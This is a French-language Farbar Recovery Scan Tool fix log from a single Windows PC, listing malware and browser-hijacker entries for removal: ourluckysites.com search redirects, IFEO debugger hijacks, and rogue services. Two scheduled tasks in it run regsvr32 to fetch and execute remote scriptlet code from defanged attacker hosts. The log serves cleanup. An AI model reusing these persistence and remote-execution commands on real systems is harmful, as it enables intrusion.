cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 20-08-2017
Exécuté par ju (28-08-2017 18:38:00) Run:1
Exécuté depuis C:\Users\ju\Desktop
Profils chargés: ju (Profils disponibles: ju)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************

CreateRestorePoint:
CloseProcesses:
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
GroupPolicy: Restriction
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
HKU\S-1-5-21-3418498205-250011256-4183487016-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT
SearchScopes: HKU\S-1-5-21-3418498205-250011256-4183487016-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT&q={searchTerms}
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.)
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.)
R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [108544 2017-04-26] () [Fichier non signé]
S2 wiasvc; C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp [84 2017-06-01] () [Fichier non signé]
C:\Users\ju\AppData\Local\background_fault\aswRD.exe
C:\Windows\Tasks\{66AD2C0B-18EF-D516-D709-7E8C7599C462}.job
HKU\S-1-5-21-3418498205-250011256-4183487016-1001\...\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier
Task: {0256F7A3-EF25-48BD-A62A-219F40B2112C} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier
Task: {0E6E18F8-2F67-4D8C-A3D3-66373C3FCA35} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier
Task: {1C05EB90-59DB-492C-9940-B6B1F643ECC4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier
Task: {26C3685F-61C0-4870-8887-A2186572A8D3} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier
Task: {3875D375-30E6-4508-80E6-D569C4ECF4F7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier
Task: {53279C3F-F7D4-4946-AC21-16C8CB5E5FCC} - System32\Tasks\{66AD2C0B-18EF-D516-D709-7E8C7599C462} => C:\Users\ju\AppData\Roaming\66AD2C~1\sync.exe
Task: {53F52824-5585-4C69-A155-4024F3DEA125} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier
Task: {727B5C37-BBDA-4663-9302-420BEA1DB9E3} - \WPD\SqmUpload_S-1-5-21-3418498205-250011256-4183487016-1001 -> Pas de fichier
Task: {7FCF2AA0-A6C9-4705-A4A8-347C9E554005} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier
Task: {8CA6606A-F0EB-4DA7-9AE6-918B92B0601D} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Pas de fichier
Task: {8FCD573B-3DB6-4405-98A5-D7AD8F45689A} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MdVQNkYxFdw3MWqyMkZWNYNLNdU1NdM8OUZXNkF1Mq== scrobj.dll
Task: {99B4CED9-7636-47F2-8C23-819219CD5D96} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier
Task: {A6018763-0286-4F6C-85CA-9512B2D500E4} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Pas de fichier
Task: {A9D82432-88F3-4E9E-9C21-D46CB1DEDE66} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Pas de fichier
Task: {ED706D6C-503F-400D-9ED8-175EF67A4FEA} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier
Task: {EF3E0A66-3DAA-41D7-99FC-62E020F060B2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier
Task: {F29C2C95-8BCA-4714-9870-30A9D3C75C4D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
Task: {FCD47831-FFD6-48E1-8436-D3B1C3416B4C} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MdVQNkYxFdw3MWqyMkZWNYNLNdU1NdM8OUZXNkF1Mq== scrobj.dll
Task: C:\WINDOWS\Tasks\{66AD2C0B-18EF-D516-D709-7E8C7599C462}.job => C:\Users\ju\AppData\Roaming\66AD2C~1\sync.exe
ShortcutWithArgument: C:\Users\ju\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493793283&z=a7cd4d0ff529c66bd1740d2g0z0tbcfmdtecbo7mdg&from=ypid&uid=TOSHIBAXMQ01ABD075_64LGC24OTXX64LGC24OT
ShortcutWithArgument: C:\Users\ju\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\QGIS Desktop 2.18.0.lnk -> C:\Program Files\QGIS 2.18\bin\nircmd.exe (NirSoft) -> exec hide C:\PROGRA~1\QGIS2~1.18\bin\qgis.bat
AlternateDataStreams: C:\WINDOWS\system32\Drivers\wuepltjz.sys:changelist [1406]
FirewallRules: [{0D630EDE-4D41-4DE1-B276-3AFBD56F5AE5}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609_0\SZBrowser.exe
FirewallRules: [{563945AE-805F-4F24-A6B4-731B1820596D}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser.exe
EmptyTemp:

*****************


Publicité


Signaler le contenu de ce document

Publicité